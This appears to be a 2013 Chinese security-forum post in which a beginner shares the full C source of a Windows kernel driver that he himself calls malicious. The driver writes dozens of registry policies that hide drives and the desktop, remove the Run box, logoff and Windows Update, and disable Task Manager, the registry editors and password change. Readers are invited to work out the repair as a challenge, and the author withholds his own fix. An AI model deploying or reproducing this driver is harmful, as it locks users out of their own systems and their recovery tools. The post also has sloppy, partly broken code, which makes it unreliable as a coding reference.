-
-
[原创]一个菜鸟的内核学习——注册表恶意驱动
-
发表于: 2013-5-30 01:52
-
能够完成这个恶意程序我先要感谢一下牛人医生wulongxian。这个驱动程序是按照他提供的一些资料实现的,也感谢他一直以来对我的支持。
大牛勿喷,吾等菜鸟消遣而已。
进入正题,这是一个可修复的恶意驱动程序,请在虚拟机测试。修复的方法大家看代码就知道了。不过有一点难度,各显神通吧!希望大家能个把修复的方法贴出来
。
如果不能确定自己能修复建议虚拟机安装一个QQ,以防万一。本人方法暂时不公布……
这个驱动可用于系统保护,本来想添加重启的,但是怕大家误会,所以请手动重启。驱动加载后的效果请大家测试(重启,记得重启),我就不多说了。
为了秉持不作恶的原则,这里将会把源代码完全贴出来,希望大家不要拿去做坏事
。思路我就不多说了
,代码注释很多……
我的测试环境是WIN7,如果想在XP里面测试,请重新编译源代码。
有附件,去下载吧!
//头文件
//博客:http://blog.csdn.net/fsjaky
//作者:fsjaky
#include<ntddk.h>
//[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]//ExplorerValueName
CHAR *ExplorerValueName[57]={
L"NoDriveTypeAutoRun",
L"NoStartMenuSubFolders",
L"NoSMConfigurePrograms",
L"NoToolbarsOnTaskbar",
L"NoUserNameInStartMenu",
L"NoStartMenuPinnedList",
L"NoStartMenuMFUprogramsList",
L"NoStartMenuEjectPC",
L"NoStartMenuMorePrograms",
L"NoSMBalloonTip",
L"NoSimpleStartMenu",
L"NoAutoTrayNotify",
L"NoTaskGrouping",
L"GreyMSIAds",
L"NoResolveTrack",
L"MemCheckBoxInRunDlg",
L"NoResolveSearch",
L"NoInstrumentation",
L"ClearRecentDocsOnExit",
L"Intellimenus",
L"NoRecentDocsHistory",
L"NoTrayContextMenu",
L"NoSetTaskbar",
L"NoChangeStartMenu",
L"ForceStartMenuLogOff",
L"NoStartMenuNetworkPlaces",
L"NoStartMenuMyMusic",
L"NoRun",
L"NoSMMyPictures",
L"NoSMHelp",
L"NoFind",
L"NoFavoritesMenu",
L"NoNetworkConnections",
L"NoSetFolders",
L"NoRecentDocsMenu",
L"NoSMMyDocs",
L"NoCommonGroups",
L"NoWindowsUpdate",
L"ForceClassicControlPanel",
L"NoWelcomeScreen",
L"NoLogoff",
L"NoDesktopCleanupWizard",
L"NoSaveSettings",
L"NoMovingBands",
L"DisablePersonalDirChange",
L"NoCloseDragDropBands",
L"NoRecentDocsNetHood",
L"NoInternetIcon",
L"NoNetHood",
L"NoPropertiesMyComputer",
L"NoPropertiesRecycleBin",
L"NoPropertiesMyDocuments",
L"NoDrives",
L"NoViewOnDrive",
L"NoDesktop",
L"NoControlPanel",
L"HonorAutoRunSetting"
};
//[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]//ExplorerDWORDKeyValue
ULONG ExplorerKeyValue[57]={
255,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
67108855,
67108855,
1,
1,
1
};
//[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum]
CHAR *NonEnumValueName[6]={
L"{BDEADF00-C265-11D0-BCED-00A0C90AB50F}",
L"{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF}",
L"{0DF44EAA-FF21-4412-828E-260A8728E7F1}",
L"{645FF040-5081-101B-9F08-00AA002F954E}",
L"{450D8FBA-AD25-11D0-98A8-0800361B1103}",
L"{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
};
ULONG NonEnumKeyValue[6]={
1,
1073741857,
32,
1,
1,
1
};
//[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
//systemValueName[]={
CHAR *SystemValueName[9]={
L"dontdisplaylastusername",
L"legalnoticecaption",
L"legalnoticetext",
L"shutdownwithoutlogon",
L"undockwithoutlogon",
L"DisableRegistryTools",
L"DisableTaskMgr",
L"DisableLockWorkstation",
L"DisableChangePassword"
};
ULONG SystemKeyValue[9]={
0,
0,//"0"//NULL
0,//"0"//NULL
1,
1,
2,
1,
1,
1
};
//.c文件
//博客:http://blog.csdn.net/fsjaky
//作者:fsjaky
#include <ntddk.h>
#include <Ntstrsafe.h>
#include "RegeditValue.h"
#define MY_REG_SOFTWARE_KEY_NAME L"\\Registry\\User"
#define MY_REG_NOENUM L"\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\NonEnum"
#define MY_REG_SYSTEM L"\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\system"
UNICODE_STRING StringOfRegCurrentUser;
DWORD i = 0;
//**********************************************
//函数说明:在内核中获取注册表HKEY_CURRENT_USER路径
//参数:无
//返回值:无
//**********************************************
VOID GetCurrentUserPath()
{
HANDLE hRegister;
OBJECT_ATTRIBUTES ObjectAttributes;
ULONG ulSize;
PKEY_FULL_INFORMATION pfi;
ULONG i;
PKEY_BASIC_INFORMATION pbi = NULL;
UNICODE_STRING uniKeyName;
WCHAR CurrentUserbuf[256];
WCHAR ProfileListbuf[256];
UNICODE_STRING RegCurrentUser,RegUser;
UNICODE_STRING RegProfileList,RegProf;
RTL_QUERY_REGISTRY_TABLE paramTable[2];
ULONG udefaultData=0;
ULONG uQueryValue;
KdPrint(("Entry GetCurrentUserPath\n"));
RtlZeroMemory(paramTable,sizeof(paramTable));
paramTable[0].Flags=RTL_QUERY_REGISTRY_DIRECT;
paramTable[0].Name=L"RefCount";
paramTable[0].EntryContext=&uQueryValue;
paramTable[0].DefaultType=REG_DWORD;
paramTable[0].DefaultData=&udefaultData;
paramTable[0].DefaultLength=sizeof(ULONG);
RtlInitUnicodeString(&RegProf,L"\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\");
RtlInitUnicodeString(&RegUser,L"\\Registry\\User\\");
RtlInitEmptyUnicodeString(&RegCurrentUser,CurrentUserbuf,256*sizeof(WCHAR));
RtlInitEmptyUnicodeString(&RegProfileList,ProfileListbuf,256*sizeof(WCHAR));
RtlCopyUnicodeString(&RegCurrentUser,&RegUser);
RtlCopyUnicodeString(&RegProfileList,&RegProf);
InitializeObjectAttributes(&ObjectAttributes,&RegProf,OBJ_CASE_INSENSITIVE,NULL,NULL);
ZwOpenKey(&hRegister,KEY_ALL_ACCESS,&ObjectAttributes);
ZwQueryKey(hRegister,KeyFullInformation,NULL,0,&ulSize);
pfi=(PKEY_FULL_INFORMATION)ExAllocatePool(PagedPool,ulSize);
ZwQueryKey(hRegister,KeyFullInformation,pfi,ulSize,&ulSize);
for (i=0;i<pfi->SubKeys;i++)
{
ZwEnumerateKey(hRegister,
i,
KeyBasicInformation,
NULL,
0,
&ulSize);
pbi =(PKEY_BASIC_INFORMATION)ExAllocatePool(PagedPool,ulSize);
ZwEnumerateKey(hRegister, i, KeyBasicInformation, pbi, ulSize, &ulSize);
uniKeyName.Length =
uniKeyName.MaximumLength =(USHORT)pbi->NameLength;
uniKeyName.Buffer = pbi->Name;
if (pbi->NameLength>20)
{
RtlAppendUnicodeStringToString(&RegCurrentUser,&uniKeyName);
RtlAppendUnicodeStringToString(&RegProfileList,&uniKeyName);
RtlQueryRegistryValues(RTL_REGISTRY_ABSOLUTE,RegProfileList.Buffer,paramTable,NULL,NULL);
if (uQueryValue>0)
{
KdPrint(("HKET_CURRENT_USER: %wZ\n",&RegCurrentUser));
StringOfRegCurrentUser.Buffer = (PWSTR)ExAllocatePool (PagedPool,256);
StringOfRegCurrentUser.MaximumLength = 256;
RtlCopyUnicodeString(&StringOfRegCurrentUser,&RegCurrentUser);
KdPrint(("Want To Change Key is:%wZ\n",&StringOfRegCurrentUser));
}
}
RtlCopyUnicodeString(&RegCurrentUser,&RegUser);
RtlCopyUnicodeString(&RegProfileList,&RegProf);
}
ExFreePool(pbi);
ExFreePool(pfi);
KdPrint(("Leave GetCurrentUserPath\n"));
ZwClose(hRegister);
}
//***********************************************************************************
//函数说明:
//在[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]中,
//添加键值
//参数: ArrayValueName[] 键值名称
// ArrayKeyValue[] 键值
// n 添加的项数
//返回值:无
//*************************************************************************************
VOID SetRegKeyDWord(CHAR* ArrayValueName[],ULONG ArrayKeyValue[],int n)
{
UNICODE_STRING RegUnicodeString;
HANDLE hRegister;
OBJECT_ATTRIBUTES objectAttributes;
UNICODE_STRING ValueName; //REG_DWORD 键值名称
ULONG ulValue ; //键值
NTSTATUS ntStatus;
RegUnicodeString.Buffer = (PWSTR)ExAllocatePool (PagedPool,256);
RegUnicodeString.MaximumLength =256;
RtlCopyUnicodeString(&RegUnicodeString,&StringOfRegCurrentUser);
//初始化objectAttributes
InitializeObjectAttributes(&objectAttributes,
&RegUnicodeString,
OBJ_CASE_INSENSITIVE,//对大小写敏感
NULL,
NULL );
//打开注册表
ntStatus = ZwOpenKey( &hRegister,KEY_ALL_ACCESS,&objectAttributes);
if (NT_SUCCESS(ntStatus))
{
KdPrint(("Open register successfully\n"));
}
else
{
KdPrint(("Open register fail\n"));
}
//初始化ValueName *ExplorerValueName
RtlInitUnicodeString( &ValueName, (PCWSTR)ArrayValueName[n]);
//KdPrint(("ExplorerValueName :%wZ\n",&ValueName));
//设置REG_DWORD子键
ulValue = ArrayKeyValue[n];
//KdPrint(("DWORD Key Value:%d cout:%d\n",ulValue,i));
//i++; //统计计数
KdPrint(("ZwSetValueKey\n"));
ZwSetValueKey(hRegister,
&ValueName,
0,
REG_DWORD,
&ulValue,
sizeof(ulValue));
KdPrint(("Leave SetRegKeyDWord\n"));
RtlFreeUnicodeString (&RegUnicodeString);
//关闭注册表句柄
ZwClose(hRegister);
}
//***********************************************************************************
//函数说明:
//在[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]或者
//[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system]中,
//添加键值
//参数: ArrayValueName[] 键值名称
// ArrayKeyValue[] 键值
// n 添加的项数
//返回值:无
//*************************************************************************************
VOID SetRegNoEnumOrSystem(CHAR* ArrayValueName[],ULONG ArrayKeyValue[],int n,int falgs)
{
UNICODE_STRING RegUnicodeString;
HANDLE hRegister;
UNICODE_STRING ValueName;
ULONG ulValue;
OBJECT_ATTRIBUTES objectAttributes;
NTSTATUS ntStatus;
ULONG ulResult;
KdPrint(("Entry SetRegNoEnumOrSystem\n"));
//初始化UNICODE_STRING字符串
if(falgs == 1) //
RtlInitUnicodeString( &RegUnicodeString, MY_REG_NOENUM);
else if(falgs == 2) //
RtlInitUnicodeString( &RegUnicodeString, MY_REG_SYSTEM);
//KdPrint(("Open register %wZ\n",&RegUnicodeString));
//初始化objectAttributes
InitializeObjectAttributes(&objectAttributes,
&RegUnicodeString,
OBJ_CASE_INSENSITIVE,//对大小写敏感
NULL,
NULL );
//创建注册表项
ntStatus = ZwCreateKey( &hRegister,
KEY_ALL_ACCESS,
&objectAttributes,
0,
NULL,
REG_OPTION_NON_VOLATILE,
&ulResult);
if (NT_SUCCESS(ntStatus))
{
//判断是否被创建
if(ulResult==REG_CREATED_NEW_KEY)
{
KdPrint(("The register item is created\n"));
}
else if(ulResult==REG_OPENED_EXISTING_KEY)
{
KdPrint(("The register item has been created,and now is opened\n"));
}
}
//打开注册表
ntStatus = ZwOpenKey( &hRegister,KEY_ALL_ACCESS,&objectAttributes);
if (NT_SUCCESS(ntStatus))
{
KdPrint(("Open register successfully\n"));
}
else
{
KdPrint(("Open register Fail\n"));
}
//初始化ValueName
RtlInitUnicodeString( &ValueName, (PCWSTR)ArrayValueName[n]);
//KdPrint(("ExplorerValueName :%wZ\n",&ValueName));
//设置REG_DWORD子键
ulValue = ArrayKeyValue[n];
//KdPrint(("DWORD Key Value:%d cout:%d\n",ulValue,i));
//i++; //统计计数
ZwSetValueKey(hRegister,
&ValueName,
0,
REG_DWORD,
&ulValue,
sizeof(ulValue));
KdPrint(("Leave SetRegNoEnumOrSystem\n"));
//关闭注册表句柄
ZwClose(hRegister);
}
NTSTATUS DriverUnLoad(PDRIVER_OBJECT DriverObject)
{
DbgPrint("UnLoad!");
}
NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject , PUNICODE_STRING reg_path)//OBJECT_ATTRIBUTE
{
ULONG n;
ULONG KeyValue;
UNICODE_STRING ValueName;
NTSTATUS ntStatus;
UNICODE_STRING temp={0};
KdPrint(("Entry DriverEntry\n"));
DriverObject->DriverUnload = DriverUnLoad;
GetCurrentUserPath(); //获取注册表路径
//初始化UNICODE_STRING字符串
RtlInitUnicodeString( &temp, L"\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
ntStatus = RtlUnicodeStringCat(&StringOfRegCurrentUser,&temp);
if(STATUS_SUCCESS == ntStatus)
{
KdPrint(("Temp String KEY_EXPLORER is:%wZ\n",&temp));
KdPrint(("The new Open Key is:%wZ\n",&StringOfRegCurrentUser));
}
else if(STATUS_BUFFER_OVERFLOW == ntStatus)
{
KdPrint((" STATUS_BUFFER_OVERFLOW\n"));
}
else if(STATUS_INVALID_PARAMETER == ntStatus)
{
KdPrint(("STATUS_INVALID_PARAMETER\n"));
}
for(n = 0; n<57; n++)
{
SetRegKeyDWord(ExplorerValueName,ExplorerKeyValue,n);
}
RtlFreeUnicodeString(&StringOfRegCurrentUser ); //添加完成后释放内存
//添加 NonEnum 项 和 键值
for(n = 0; n<6; n++)
SetRegNoEnumOrSystem(NonEnumValueName,NonEnumKeyValue,n,1);
//添加 System 项 和 键值
for(n = 0; n<9; n++)
SetRegNoEnumOrSystem(SystemValueName,SystemKeyValue,n,2);
KdPrint(("Leave DriverEntry\n"));
return STATUS_SUCCESS;
}
有附件,去下载吧!
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
 15字呀15字,15字呀15字,15字呀15字,15字呀15字,积分拿走~~~
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
